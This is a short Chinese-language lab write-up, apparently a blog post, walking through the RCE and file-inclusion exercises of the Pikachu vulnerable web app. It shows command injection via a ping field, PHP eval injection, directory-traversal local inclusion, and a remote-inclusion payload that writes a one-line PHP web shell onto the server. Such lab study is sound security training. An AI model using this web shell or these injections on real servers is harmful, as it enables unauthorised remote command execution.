pikachu-rce,fileinclusion
RCE
exec ping
输入ip地址
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331144226417-1261645583.png)
后面加上个ipconfig
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331144246940-1038655330.png)
exec “eval”
这里面直接写命令不行,但是加上函数名称就可以了,输入phpinfo()就行
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331144413674-1109900805.png)
文件
文件local
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331144512604-1055688845.png)
所以运用切换目录的方法切换到其他的php文件
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331144454964-1630104679.png)
file (remote)
测试之前需要把这俩个参数改成On
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331144612019-1242051239.png)
然后创建一个代码如下的txt文件
<?php $myfile = fopen("yijuhua.php", "w"); $txt = '<?php system($_GET[x]);?>'; fwrite($myfile, $txt); fclose($myfile); ?>
然后把filename后面的参数改为你所在的文件路径
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331144646673-2083104131.png)
之后服务器就会出现你刚才创建的文件
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331144706583-686683393.png)